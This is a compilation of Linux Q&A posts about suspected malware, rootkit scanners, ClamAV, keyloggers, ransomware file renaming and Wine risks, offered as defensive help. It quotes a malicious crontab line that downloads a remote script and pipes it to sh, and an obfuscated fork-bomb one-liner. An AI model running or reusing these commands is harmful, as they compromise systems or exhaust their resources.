Based on the details in your question, your system is clean.You're making backups. OK. clamav comes up clean. That's fine, too. Based on your output of chkrootkit, your system is clean. Those files listed as suspicious are benign. The Ebury/Windigo detection is a false positive: https://github.com/Magentron/chkrootkit/issues/1 Some of the live discs you tried didn't work. That's OK. There might already be an updater running as a daemon. You're trying to execute the log file. View it in a pager instead, like less /var/log/rkhunter.log.From a logical standpoint, chkrootkit and rkhunter aren't of much use if they are used to scan the same system they execute on since they are not realtime scanners thus any decently packaged rootkit would have sabatoged the scanners before they are run. Also, both have heuristics that result in plenty of false positives. The saved files not appearing are rarely an indication of system compromise. Without knowing the contents of the "suspicious" .txt file you mention, there can be no conclusion drawn from that. DEADJOE is a backup file created by the JOE text editor. The firewall in Linux Mint is disabled by default. Edit: Added info on DEADJOE file.
I think my Linux laptop has been hacked, for three reasons:Whenever I saved files into the Home folder, the files wouldn't appear - not even in the other folders on my computer. An unfamiliar .txt file has showed up in my Home folder. Having noticed it, I didn't open it. I immediately had a suspicion that maybe my laptop has been hacked. When checking my Firewall status, it turned out that it was inactive. Thus, I have taken the following steps:I backed-up all of my recent files using two USB Sticks that aren't as important as other USB Sticks which I own - so in case those USB Sticks get infected with the potential malware, it wouldn't infect my other backed-up important files. I've used ClamTK in order to scan the aforementioned suspicious file - but apparently, for some reason, it hasn't detected any threats. I've used chkrootkit for another scan. This is the output (up until that point, nothing seemed to have been infected): Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/python2.7/dist-packages/PyQt4/uic/widget-plugins/.noinit /usr/lib/debug/.build-id /lib/modules/4.13.0-39-generic/vdso/.build-id /lib/modules/4.13.0-37-generic/vdso/.build-id /lib/modules/4.10.0-38-generic/vdso/.build-id /lib/modules/4.13.0-36-generic/vdso/.build-id /lib/modules/4.13.0-32-generic/vdso/.build-id /lib/modules/4.13.0-38-generic/vdso/.build-id /usr/lib/debug/.build-id /lib/modules/4.13.0-39-generic/vdso/.build-id /lib/modules/4.13.0-37-generic/vdso/.build-id /lib/modules/4.10.0-38-generic/vdso/.build-id /lib/modules/4.13.0-36-generic/vdso/.build-id /lib/modules/4.13.0-32-generic/vdso/.build-id /lib/modules/4.13.0-38-generic/vdso/.build-idAnd also: Searching for Linux/Ebury - Operation Windigo ssh... Possible Linux/Ebury - Operation Windigo installetdI was trying - twice - to scan my laptop with F-PROT, with fpscan, using Ultimate Boot CD. But when I tried getting into the PartedMagic section of the disc in order to use the tool, it just wouldn't work. Twice. So I was not able to use it whatsoever. When typing sudo freshclam, I got the following output: ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).Then, I scanned the computer using rkhunter. These are the warnings I got: /usr/bin/lwp-request [ Warning ] Performing filesystem checks Checking /dev for suspicious file types [ Warning ] Checking for hidden files and directories [ Warning ]And this is the summary: System checks summary =====================File properties checks... Files checked: 143 Suspect files: 1Rootkit checks... Rootkits checked : 365 Possible rootkits: 0Applications checks... All checks skippedThe system checks took: 1 minute and 10 secondsAll results have been written to the log file: /var/log/rkhunter.logOne or more warnings have been found while checking the system. Please check the log file (/var/log/rkhunter.log)So, after all that - I do not have access to the rkhunter log file as root: n-even@neven-Lenovo-ideapad-310-14ISK ~ $ sudo su neven-Lenovo-ideapad-310-14ISK n-even # /var/log/rkhunter.log bash: /var/log/rkhunter.log: Permission deniedWhat should I be doing now? Help much appreciated! Thanks a lot.
bash: /var/log/rkhunter.log: Permission denied (as root - Linux Mint 18.3)
There is a worm going around for an exim4 vulnerability in Debian: http://blog.bytemark.co.uk//2010/12/12/fresh-worm-food
Is there any virus attack on any of the current distributions of Linux? if there is any, how was it solved? have they used any anti virus programs which are available now?
Is there any Virus attack in Linux?
Make a copy of your mbox to Maildir format, for example using this Perl script or the terminal mail client mutt(1). Then clamscan that maildir – as each message is stored in a separate file in the maildir format, you'll be able to identify the offending message and hence be able to remove it from your original mbox ...
Today I ran a clamscan -ri / and got some positives for some malware. Most are in the "spam" folder, so that's no problem. But one is among my saved e-mails: /home/user/.icedove/bfa059u1.default/ImapMail/imap.server.com/INBOX.sbd/saved: Doc.Dropper.Agent-1552723 FOUND"Icedove" is Debian's rebranded Thunderbird. "saved" is the folder under the inbox that contains the message with the malware. Is there any way to get more info from Clamscan to find out the name of the attachment that contains the malware? How can I find out which particular e-mail that contains this program?Related posts: https://superuser.com/questions/107261
How to find out which particular e-mail in Thunderbird/Icedove that contains malware Doc.Dropper.Agent-1552723 pointed out by Clamscan?
If your system has been compromised at the root level, then the attacker can hide a keylogger from anything you try to detect it - by linking in a custom kernel module that intercepts the system calls that might lead to its detection at the kernel level. If that's what you suspect has happened, your only way to be reasonably sure you'll find it is by booting from a known safe live-CD image and manually scan for anything suspicious or out of place. Software like chkrootkit and debsums (the latter only applicable for debian-based distros, obviously) will help.
HW/SW/whatever keyloggers are there. How to find out? E.x.: Regularly check the cable of the keyboard, because there could be HW keyloggers: https://i.sstatic.net/kgfbY.jpg But what about other HW keyloggers, or Software keyloggers? [Using a Linux, e.x.: Fedora or Ubuntu for OS!] - How to track keylogger softwares/solutions? What are the "best-practises?
How to find out that someone is using a Keylogger on the machine I am using?
will it be able to access data from Ubuntu and steal itYes, it can, e.g. if you use something like ext2fsd and have your Linux partitions mounted in Windows. Even if you don't mount anything, advanced malware could read your disks directly and search for certain patterns in disk images and extract necessary files but I doubt such malware even exists. Advanced malware may also modify UEFI firmware itself and UEFI system (boot) partition and stay resident even after Linux loads. The bottom line is: malware under Windows can do everything you can do. If you're worried about the safety of your data in Linux make sure your Windows partition is secure as well. If you're paranoid enough, delete Windows altogether.
I have installed Ubuntu 20.04 along with Windows 10 on my laptop. I use Windows for games and Ubuntu for work. I wonder if I download some virus on Windows, will it be able to access data from Ubuntu and steal it? By data from Ubuntu I mean for example my browsing history while I was on Ubuntu.
Can malware from Windows access Ubuntu files?
Use a file change audit mechanism such as LoggedFS or Linux's audit subsystem. See also How to determine which process is creating a file?, Log every invocation of every SUID program?, Stump the Chump with Auditd 01... Assuming that the server is running Linux, the audit system looks like the best solution. Log all file renaming operations in the relevant directory tree, e.g. /var/www: auditctl -a exit,always -S rename -F dir=/var/wwwThe audit logs are normally in /var/log/audit/audit.log. Here's a sample log from cd /var/www; mv foo bar with the rule above: type=SYSCALL msg=audit(1489528471.598:669): arch=c000003e syscall=82 success=yes exit=0 a0=7ffd38079c14 a1=7ffd38079c18 a2=20 a3=7ffd38077940 items=4 ppid=5661 pid=5690 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts11 ses=1 comm="mv" exe="/bin/mv" key=(null) type=CWD msg=audit(1489528471.598:669): cwd="/var/www" type=PATH msg=audit(1489528471.598:669): item=0 name="/var/www" inode=22151424 dev=fc:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT type=PATH msg=audit(1489528471.598:669): item=1 name="/var/www" inode=22151424 dev=fc:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT type=PATH msg=audit(1489528471.598:669): item=2 name="foo" inode=22152394 dev=fc:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=DELETE type=PATH msg=audit(1489528471.598:669): item=3 name="bar" inode=22152394 dev=fc:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE
Related: https://serverfault.com/questions/748417/something-renames-files-to-filename-ext-suspected https://stackoverflow.com/questions/32835796/php-file-automatically-renamed-to-php-suspected I have a customer with a webhosting server that's running linux who is suffering from this problem. It is not a Wordpress site, although he does run Wordpress sites on that same server. We're both aware of the problem and that some of those files do indeed have malware content - however, there are also some false positives, and they are affecting the site's functioning (by rendering include files unreadable), so he's asking me to track down which part of the installed software is doing this and to put a stop to it. Trouble is, I'm not 100% sure what is causing the rename and why. I suspect clamav/amavis because it's in their purview, but nothing in cron really springs out to me as a possible cause for what appear to be weekly scans...
Something is renaming php files to .php.suspected; I'm trying to find out what
I think that the message Java.Exploit.CVE_2013_2472 FOUND means that this installer is for a version of Java affected with the security bug you posted the description of. If so, it's not a virus at all, just some piece of legit-but-dangerous software. I would say the message from ClamAV is a bit confusing, and the action of deleting the affected file may not be the most sensible, but that's open to debate.
I'm scanning one of my systems with Clamav like this: $ clamscan -r -i --remove --max-filesize=4000M --max-scansize=4000M \ --exclude=/proc --exclude=/sys --exclude=/dev --bytecode-timeout=190000It just found a virus in my download directory: /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Java.Exploit.CVE_2013_2472 FOUND /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Removed.What is the damage from this kind of malware? I downloaded this file from the official Oracle site, so I can't understand how it could be infected. Did someone manipulate this file before it entered my system and I installed some kind of malware on my Fedora? I removed the Java in question from my system and activated openjdk from the repository. Information from Oracle: Excerpt:CVE-2013-2472 Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are 7 Update 21 and before, 6 Update 45 and before and 5.0 Update 45 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized Operating System takeover including arbitrary code execution. Note: Applies to client deployment of Java only. This vulnerability can be exploited only through sandboxed Java Web Start applications and sandboxed Java applets. CVSS Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C). (legend) [Advisory]What are the procedures here, is this a Linux virus? Note "result in unauthorized Operating System takeover". EDIT #1 Here are the scan results: /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Java.Exploit.CVE_2013_2472 FOUND /home/user/Downloads/jdk-8u31-linux-x64.tar.gz: Removed. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: Unix.Trojan.MSShellcode-21 FOUND /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: Removed. ----------- SCAN SUMMARY ----------- Known viruses: 3791398 Engine version: 0.98.6 Scanned directories: 103265 Scanned files: 746031 Infected files: 2 Total errors: 18624 Data scanned: 330294.49 MB Data read: 367850.33 MB (ratio 0.90:1) Time: 33458.657 sec (557 m 38 s) 17 April 2015ClamAV is saying that there were two infections, according to @dhag this is not the case and one is an exploit/vulnerability in Java.... I am curious as to why frequently the scan is removing scripts from the nmap directory. I suspect that that's not malware but has to do with something about the capability of the script.
Exploit FOUND with clamav on Fedora 21 in Oracle's java
3 options, as I see it. 1 - Disable browser plugins I would say that the primary threat of Java is by allowing it to be invoked from the browser. So getting rid of the Java plugins to which ever browser you use would be the best option. 2 - Isolate Java - not on $PATH Going further if you know that various applications need Java then put it in a non-standard location would likely be the next best thing to do. Not ever adding it to your PATH would be part of this solution. 3 - Isolate Java to specific applications that require it Lastly you could opt to install Java only along side the applications that require it, there by relegating it to a very narrow focused use, for specific applications and nothing more. This will increase your HDD usage, but then only these handful of applications will be able to use their dedicated version of Java, and nothing else.
For me Java is just a security threat. Not many legitimate Linux apps use Java. However there is an abundance in Java malware and malicious remote administration tools like Jrat among others. But one legitimate app I run like the "Arduino IDE" may unfortunately need Java. So, I want an option to enable or disable Java whenever I want without uninstalling it. I was thinking of denying Java permission to execute using chmod. Would this work? Is there a better alternative? Would moving Java from a "bin" folder work? Edit: I just realized that Java may be deeply integrated with the OS and chmod method may work for .jar files but may not actually work for all Java executables. Important: I am not talking about Java browser plugin. I'm talking about Java on my linux system. I chose linux because it didn't have many malicious rats and botnets like Darkcomet, Poison IVy, Zeus. However there are Java rats like Jrat. Which could be autostarting once I accidentally gave them root.
How do I disable and re-enable Java whenever I want?
I caught one of the PHP "droppers" in a WordPress-like honeypot. The attackers gained access by guessing a password - brute force guessing, no hacks. The PHP is entirely ordinary. It does nothing out of the ordinary, it does not call eval, or preg_replace or even base64_decode. There's really nothing you can do at the PHP level to guard against the code in the "dropper". If you can keep attackers from guessing your WordPress or Joomla or whatever password, and keep your whatever up-to-date, and get lucky by not having any hackable plugins or 3rd-party code installed, you should be able to avoid Mayhem.
How will making sure my PHP version is updated thwart the Mayhem Malware? Will updating PHP on my Ubuntu server prevent the Mayhem Malware from being able to make it onto the server, prevent it from running, or something else? Is there anything else I can do to safeguard against it? Edit: This is the most informational article I've found which describes Mayhem: https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-Mayhem
Updating PHP to Gaurd Against Mayhem Malware
If I include Microsoft's keys in my secure boot setup, then any malware which has a Microsoft key can boot my Linux binary. Can I restrict my Linux binary to be booted only by a bootloader signed with my personal key?No. You misunderstand the chain of trust. Earlier things need to verify later things. Later things can't meaningfully verify earlier things.I know I can sign the binary itself with my personal key, but that doesn't prevent malware with a different key from booting my binary.Correct.If this is impossible, I can still sign the Windows binary with my own key and get rid of Microsoft's keys, right?Yes, and this is what you have to do if you don't want code signed by Microsoft's keys to run.
If I include Microsoft's keys in my secure boot setup, then any malware which has a Microsoft key can boot my Linux binary. Can I restrict my Linux binary to be booted only by a bootloader signed with my personal key? I know I can sign the binary itself with my personal key, but that doesn't prevent malware with a different key from booting my binary. If this is impossible, I can still sign the Windows binary with my own key and get rid of Microsoft's keys, right?
Can I require binary X to be booted only by a bootloader signed with key Y?
First go to the folder archive, then run this: find | awk -F'.' '{if ($3 != "" && $4 != "" ){system("mv "$0" ./"$2"."$3)}}'this will look for every file in the folder and in sub folders and if it find that the file have tow extension it will rename it with just the first extension for example the folder before the command: . ./lolo.doc ./soso ./soso/jojo.doc.koko.momo ./kokooiko.doc.soso ./jojo.doc.kokothe folder after the comamnd: . ./lolo.doc ./kokooiko.doc ./jojo.doc ./soso ./soso/jojo.doc
I'm trying to recover some file from a Windows archive affected by a "stupid" Crypt0L0cker ransomware. In fact, after a quick check moving files to my own system, it seems that the malware just added a second -random- extension to the files (yah, I know that "extension" doesn't mean nothing). Renaming the files manually just works. "List for 2016.doc.irolox" -> manually rename in -> "List for 2016.doc" I would like to have some tips to run this workflow:loop recursively in all subdirectory of a given folder files contains spaces in the name (but they don't contains dots in the real name) some files seems not to be affected. Rule: don't consider them if they just have ONE "extension" (so if 2 dots are detected -> file is affected) rename files removing the last "extension".Any tip to achieve this result?
Remove recursively double extension added by "stupid" Crypt0L0cker ransomware
Nothing would happen since a .exe file is meant for Windows, not Linux, so without Wine installed, and without a association to run .exe files from your mail client these files are essentially of no consequence to you. Still as a best practice you should typically never run things directly from email. You should instead get in the habit of doing a "Save As..." and then inspecting the file using tools such as file to confirm the file is as it's labeled. Example $ file <name of file>If it looks clean then go ahead and open it. Scanning for malware If you're genuinely serious about scanning email for viruses/malware then there are a few tools and techniques I've used over there years. Before I get into it I'll suggest just punting and using GMail instead. They do a fantastic job and you can use fetchmail to download all the mail from GMail and still use mutt to read and send emails. If on the other hand you're "into" doing everything yourself you can use these tools from mutt. For starters you can use spamassassin to scan incoming email. Recipes in mutt such as this will run all messages through spamassassin: :0fw | spamassassin -P:0e EXITCODE==$?You can also use a spam detection network to scan and flag emails from mutt using Vipul's Razor.Vipul's Razor is a distributed, collaborative, spam detection and filtering network. Through user contribution, Razor establishes a distributed and constantly updating catalogue of spam in propagation that is consulted by email clients to filter out known spam. Detection is done with statistical and randomized signatures that efficiently spot mutating spam content. User input is validated through reputation assignments based on consensus on report and revoke assertions which in turn is used for computing confidence values associated with individual signatures.NOTE: Setting both of these up is covered in this tutorial, titled: Spam-Fighting Tricks. Mail servers If you're really a masochist you can run your own mail server (I do this, using sendmail). With your own mail server you have a even larger arsenal of tools available such as:spamassassin milter-greylist GeoIP clamav spamassassin-milter clamav-milter SPFThe above tools range from using a mix of online databases of emails that are known to be malware related, to blocking emails based on the geographic IP address that sent them to using DNS rules via SPF (Sender Policy Framework). These solutions are what I would consider more enterprise grade but work very well, but require a fair amount of time and knowledge in setting them up and tending to them afterwards. ReferencesHow to Setup a Mail Server on CentOS 5
I received a really classic spam mail stating that I have to pay a bill. The mail included an attachment (.exe). Just for curiosity reasons: What would happen if I click on the attachment? (I am running Crunchbang, no Wine installed)? Is there a way to securely inspect the attachment?
Securely inspect email attachment
Google announced this is not a problem; if you add a domain account to the machine, Chrome will now show this message. Many thanks to the esteemed Rui F Ribero who does waay too much for us here, and who provided the original link.
today I opened google chrome and saw this on customize and Control menu : "managed by your organization" , is that a malware sign ? if yes how can I completely remove that malware? my os is a Linux RHEL distributions and my chrome version is : 75.0.3770.80 (Official Build) (64-bit)
google chrome “managed by your organization” on linux
An antivirus for Debian really is not a requirement, but if you share files with others, it may be wise to scan the files before sharing them. An antivirus isn't very needed because Linux is open source, which means that everyone can tell where the flaws are, even if there are many flaws, but nobody has discovered them yet (including attackers), or they are minor (they don't compromise an important part of the system), attackers can't do much. I have never used an antivirus with Linux and I haven't got a problem. Of course it's safer to do it because you never know, it's up to you.
I use Debian 7 and I visit unknown and different websites. I want to know that people say that we get virus form internet and those virus hack our Bank accounts. Do I really need any antivirus? I have 512 MB RAM. Also, I do not install software from our sources except repository. My RAM is 47% used. I have also installed Wine.
Do I really need an antivirus on Debian 7? [closed]
There is also the possibility, that any malware install itself in the MBR/VBR boot sectors of the drive. From there it could be executed automatically if booting from USB storage devices is enabled. As soon as the malware runs, it could install nasty root/bootkits. To clean the MBR of the usb drive from any malware, install a new one. And remove any existing bootflag from all partitions on the drive by using fdisk or any other partition manager (gparted, cfdisk, ...)
When I use my USB drive on Windows computers, then return to my Linux computer, I find many extra files are added to the drive, often exe files and various folders.Is it sufficient to delete the new files? Will some viruses be placed inside my files? Is there some software to help identify and delete these, from Linux?
Deleting viruses from USB
QUESTION: What does the "clamav@scan" service do by default if it finds threats?It informs the client FURTHER QUESTION: I would like ClamAV to have the "classic" behavior of an antivirus engine, that is, remove threats automatically. it doesn't do that. it just sits around waiting for something to give it a file to inspect.If he doesn't do this by default what should I do to make him do it?use the "clamscan" command.
I have been researching ClamAV to understand what the "clamd@scan" service does by default in case of finding threats. So far I have not been able to get a satisfactory and clear answer (forums, documentations, etc)...QUESTION: What does the "clamav@scan" service do by default if it finds threats?FURTHER QUESTION: I would like ClamAV to have the "classic" behavior of an antivirus engine, that is, remove threats automatically. If he doesn't do this by default what should I do to make him do it? NOTE: The operating system of choice was CentOS 7 and the process used is described in this tutorial https://hostpresto.com/community/tutorials/how-to-install-clamav-on-centos-7/ . Thanks! =D
ClamAV - What does the "clamd@scan" service do by default?
Stop there! Your system has been infected by a malware. At this point, you can't trust what your system says. The malware may have modified the kernel. What you see is what the malware wants you to see. The system may not behave consistently. Don't expect a file to be modified just because the editor saved it successfully, for example. To reiterate, forget about understanding permissions, immutable attributes, etc. All that stuff is for a working system. On a compromised system, things do not behave in any consistent way. What you need to do now is:Take the server offline immediately. It may be infecting users with malware. Take a backup. Don't erase any of your existing backups! You need a backup of the infected system for two reasons: to trace where the infection came from, and to ensure that you have the latest data. Figure out how you got infected. This is important: if you bring the system back up with the same security hole as before, it'll get infected again. Install a new system from scratch. You cannot reliably remove malware from a system. Malware tries to make this difficult, and you can never be sure that you out-tricked it. Make sure to install the latest security updates of all software, and to configure it securely, so that it won't get infected again. Restore your data. Make sure that you restore only data, and not vulnerable software.See also How do I deal with a compromised server?
In a means to suppress a malware that created a crontab entry below, II introduced the usage of cron.deny */5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|shHowever, all user crontabs suddenly stopped triggering every job. During troubleshooting, I observed all cron associated file for all users are not editable. ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.denyls -lht /var/spool/cron/root -rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/rootchmod 775 /etc/cron.deny chmod: changing permissions of `/etc/cron.deny': Operation not permittedchmod 775 /var/spool/cron/root chmod: changing permissions of `/var/spool/cron/root': Operation not permittedI later found out they all have an immutable attribute. lsattr /var/spool/cron/root ----i--------e- /var/spool/cron/rootlsattr /etc/cron.deny ----i--------e- /etc/cron.denyI changed the immutable attribute using commands below: chattr -i /etc/cron.deny chattr -i /var/spool/cron/rootYet the cron fails to trigger these jobs.
Why are my crontab user files immutable and doesn't get executed even after changing attribute to mutable?
For the most part an AV just scans files. It will remove malicious Windows payloads when running on Linux (and vice versa). The detection doesn't depend on the host architecture or operating system at all, as malware code is not being run by the AV at runtime. So, as long as you mount your Windows NTFS partition somewhere under Linux, you can tell your Linux AV to scan the files in it for malware (or just let it do it's default thing where it scans all possible filesystems). Thus you are just plain looking for Linux AV software, with no special requirements.
Hopefully, not too broad of a question. For Windows 10, I was considering dual booting at least for the purposes of malware detection and removal. While AVG, and probably others, offer live rescue discs, what is feasible from an outside source? Ideally I would use a laptop running Linux to scan the windows pc, but let's assume a dual-boot scenario. Can I "install" AVG, Kaspersky, et. al. "to" Linux to scan another partition on the same hard drive? The target pc uses secure boot, UEFI.
how do I scan the windows partition for malware?
Its coded in VBScript and affects only PCs running Windows distributions.
Recently I connected to my linux a pendrive infected with VBS Jenxcus. Did it affect my operating system?
Does virus VBS Jenxcus affect Linux operating system? [closed]
a) Can I scan the same file concurrently by multiple antiviruses at the same time?Yes you should be able to scan the files concurrently. The only issue is if your server can handle the load of multiple scanners running at the same time. I might do 2 or 3 of them at a time, just to limit things. b) Should I run each antivirus only when it's needed (an user has uploaded a file and it has to be scan) and should they run all the time in background? If the second option, won't they conflict with each other? c) In case, there are more files have to be scanned, should I run a new process-antivirus for each file or can I "queue" the files for each antivirus?I'd opt to scan them on demand, meaning scan them each time a file is uploaded, just to spread the burden out, assuming you don't get a ton of file uploads. If it's a high volume situation I'd change tactics slightly and scan them at designated times of the day. Depending on how you structure your scanning, you'll likely need to delay making the files available until the scanning step has been completed.
I start needing to scan for viruses all files uploaded to my website. I've implemented a pretty simple prototype which I tested locally and it seemed work well. However, I need to make it more complex by involving more antiviruses to be able scan an uploaded file by each of them. But I'm hesitating. Here are the possible issues: a) Can I scan the same file concurrently by multiple antiviruses at the same time? b) Should I run each antivirus only when it's needed (an user has uploaded a file and it has to be scan) and should they run all the time in background? If the second option, won't they conflict with each other? c) In case, there are more files have to be scanned, should I run a new process-antivirus for each file or can I "queue" the files for each antivirus? Yes, I'm aware about third-party services doing exactly this, I don't need them.
Scanning a file by multiply antiviruses
Command should be executed with superuser privilege, or enable scan_user_access in conf.maldet: sudo maldet --scan-allor: sudo sed -i 's/scan_user_access="0"/scan_user_access="1"/' /usr/local/maldetect/conf.maldet maldet --scan-allIn your case, to modify the configuration file: sudo sed -i 's/scan_user_access="0"/scan_user_access="1"/' /home/mn/maldetect-1.6.4/files/conf.maldetTo run the command: /home/mn/maldetect-1.6.4/files/maldetYou can create an alias, put the folowing line in your ~/.bashrc alias maldet='/home/mn/maldetect-1.6.4/files/maldet'Then run: exec bash maldet
I am trying to install LMD linux malware Detect version 1.6.4 on Ubuntu. It shows that the installation was completed successfully; I could even open the conf.maldet for configuration options via terminal, when I try to run the LMD, it says "maldet command not found". I noticed on the installation guides/tutorials on previous versions that it will be automatically unpacked in usr/local/, mine says the same but when I go to my usr/local/ I do not see maldet as is expected. My maldetect-1.6.4 is installed in the home directory and it only contains a 'files' directory inside where all other directories are kept. (base) mn@mn-MS-7C02:~$ -maldet --scan-all -maldet: command not found (base) mn@mn-MS-7C02:~$ /home/mn/maldetect-1.6.4/files/maldet -u or maldet -d Linux Malware Detect v1.6.4 (C) 2002-2019, R-fx Networks <[emailprotected]> (C) 2019, Ryan MacDonald <[emailprotected]> This program may be freely redistributed under the terms of the GNU GPL v2maldet(13231): {glob} $intcnf not found, aborting.Any suggestion or help is very much appreciated.
maldet command not found when installing LMD on Linux Ubuntu
basically lets say you are a forensic investigator and you are given a linux system like Ubuntu, and are asked to find suspicious startup executables, how will you do it and what tools will you use to fasten the process?You can inspect every program executed on a machine using forkstat. The output will contain a ton of noise due to the sheer amount of processes spawning at any given time, but the list you obtain through this should be exhaustive. [0] Let’s assume the kernel on the system you’re analyzing has the NETLINK_CONNECTOR functionality enabled and your forkstat binary is not compromised, e. g. you compiled and deployed it yourself. You have to decide how early you want it to start listening for events. Create a unit file and hook into the system startup at an appropriate moment, e. g. basic.target: # cat /etc/systemd/system/forkstat.service [Unit] Description=process sniffer[Service] ExecStart=/sbin/forkstat[Install] WantedBy=basic.targetVerify that it works by starting the service and observing the result with journalctl -f. The forkstat output will then be captured in the system journal. Note that this is a really early on during startup, before the root filesystem is even available, so for this to work the forkstat binary must be available in the initrd. How you add it to the initrd depends on the distro. For Arch it’s as simple as adding it to the BINARIES=… line in mkinitcpio.conf. Enable the service, rebuild the initrd, reboot. After the new boot you can use journalctl -b to review the captured events: Dec 04 10:12:17 zombo.com systemd[1]: Started process sniffer. Dec 04 10:12:17 zombo.com forkstat[318]: Time Event PID Info Duration Process Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 exec 321 [/sbin/modprobe -q -- iptable_nat] Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 1 parent /sbin/init Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 322 child /sbin/init Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 exit 313 0 0.610s /usr/sbin/rpc.idmapd Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 2 parent [kthreadd] Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 323 child [kthreadd] Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 265 parent /usr/lib/systemd/systemd-udevd Dec 04 10:12:17 zombo.com forkstat[318]: 10:12:17 fork 324 child /usr/lib/systemd/systemd-udevdYou will be interested mostly in the parent and child lines which indicate what process executed which binary. I’ll refer you to the forkstat manpage for the details. Caution: Since this is an exhaustive overview of process spawning activity, the journal can get quite big. Make sure you set the journal limits to appropriately large values to accommodate the tremendous amount of log messages generated. Also note that the veracity of this output depends on a trustworthy kernel. If you suspect the kernel itself has been compromised, rootkit style, you may want to deploy a known trustworthy kernel first. [0] On a really busy system some events might get dropped which is an artifact of the underlying netlink API that forkstat uses.
In Windows, Autoruns tool is a really helpful tool for forensic investigators to help them find suspicious startup executables and filter the benign ones. but i couldn't anything good like this in linux, so what is the easiest way to achieve what autoruns does in finding suspicious startup apps? any tool like that in linux? basically lets say you are a forensic investigator and you are given a linux system like Ubuntu, and are asked to find suspicious startup executables, how will you do it and what tools will you use to fasten the process?
What is the equivalent of autoruns tool in linux for finding suspicious startup executables?
I am going to try some linux live CDs made by individuals, I want to make sure that it's not malware contained, how do I do it?You can't. You're running arbitrary software on your machine; it could do anything at all, and there's simply no way to check for that in advance. They intentionally have the ability to overwrite your hard drive, for example, because that's the fundamental point of them. If you don't trust the source, don't trust the disc.If you want to try them out (reasonably) safely, you can use a virtual machine such as VirtualBox or VMWare, which will isolate the running code from your real machine. There are several questions here and on SuperUser about setting those up.
I am going to try some Linux live CDs made by individuals. I want to make sure that it doesn't contain malware. How do I do it?
How can I do a virus scan on a Linux CD or ISO from windows?
Pretty sure the base64 string is just a cover up and is never run. The embedded fork bomb runs first and never returns.
I can't figure out what this is trying to do. The part between backticks looks like a plain old forkbomb, but the base64 doesn't seem to decode to anything sensible. Can you help? Don't run it, obviously :) eval $(echo "a2Vrf4xvcml\ZW%3t`r()(r{,54}|r{,});r`26a2VrZQo=" | base64 -d)
What is the exact function of this malicious bash one-liner?
As reported here and here, the Linux.MulDrop.14 malware is a Bash script which exploits the victim by installing and running a crypto-currency mining program. As I understand it, it needs to be run inside the machine to infect it; other vectors of infection aren't specified. Therefore, if you don't run or install dubious software or scripts, you should be fine. You should also change the default password of your Raspberry PI. Beside being a possible entry point for the first infection, it will also cause the infection to spread: once the malware manages to infect a RaspberryPI, it will SSH to other machines in the network using the default RaspberryPI credentials "login=pi, password=raspberry", then upload and run a copy of itself.
The Dr.Web has recently discovered a new linux malware called Linux.MulDrop.14 , targeting rpi with raspbian OS.Linux.MulDrop.14 Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.How to secure Raspberry-Pie with raspbian OS , controlled over SSH against the Linux.MulDrop.14 malware ?
How to secure Raspberry-Pie controlled over SSH against the Linux.MulDrop.14 malware?
Full disclosure: I'm not a WINE user but found this question interesting so I did a bit of digging. Apparently malware has been found to run inside of WINE, but what is the potenial for it to affect the host system? I would assume WRT normal windows viruses, there is no meaningful context for them to do their real work in. They'll just think they are, or not work. But, e.g., if there is a way to write to the boot sector of your hard drive in a transparent way from WINE (by "transparent way" I mean, whatever way it is a virus would do this via Windows), then that's a serious risk, because some of them do that. Since WINE isn't a real emulator (a good thing) and wasn't created from actual windows source, exploits based on real windows flaws/backdoors probably cannot work. However, a virus that targets WINE specifically -- i.e., one which can tell it is running in WINE on *nix -- could presumably do things with the privileges of the WINE process. The last question in the WINE FAQ addresses the issue a bit, which I'll reproduce part of here:11.1. Wine is malware-compatible Just because Wine runs on a non-Windows OS doesn't mean you're protected from viruses, trojans, and other forms of malware. There are several things you can do to protect yourself:Never run executables from sites you don't trust. Infections have already happened. In web browsers and mail clients, be suspicious of links to URLs you don't understand and trust. Never run any application (including Wine applications) as root (see above). Use a virus scanner, e.g. ClamAV is a free virus scanner you might consider using if you are worried about an infection; see also Ubuntu's notes on how to use ClamAV. No virus scanner is 100% effective, though. Removing the default Wine Z: drive, which maps to the unix root directory, is a weak defense. It will not prevent Windows applications from reading your entire filesystem, and will prevent you from running Windows applications that aren't reachable from a Wine drive (like C: or D:). A workaround is to copy/move/symlink downloaded installers to ~/.wine/drive_c before you can run them. If you're running applications that you suspect to be infected, run them as their own Linux user or in a virtual machine (the ZeroWine malware analyzer works this way).So, it appears that there are reported cases of malware appearing inside of WINE, but none reporting that they are somehow affecting stuff outside of WINE. However, the potential obviously exists, if someone wrote malware that targeted WINE specifically, or if WINE gives transparent access to certain hardware. You can guard against the 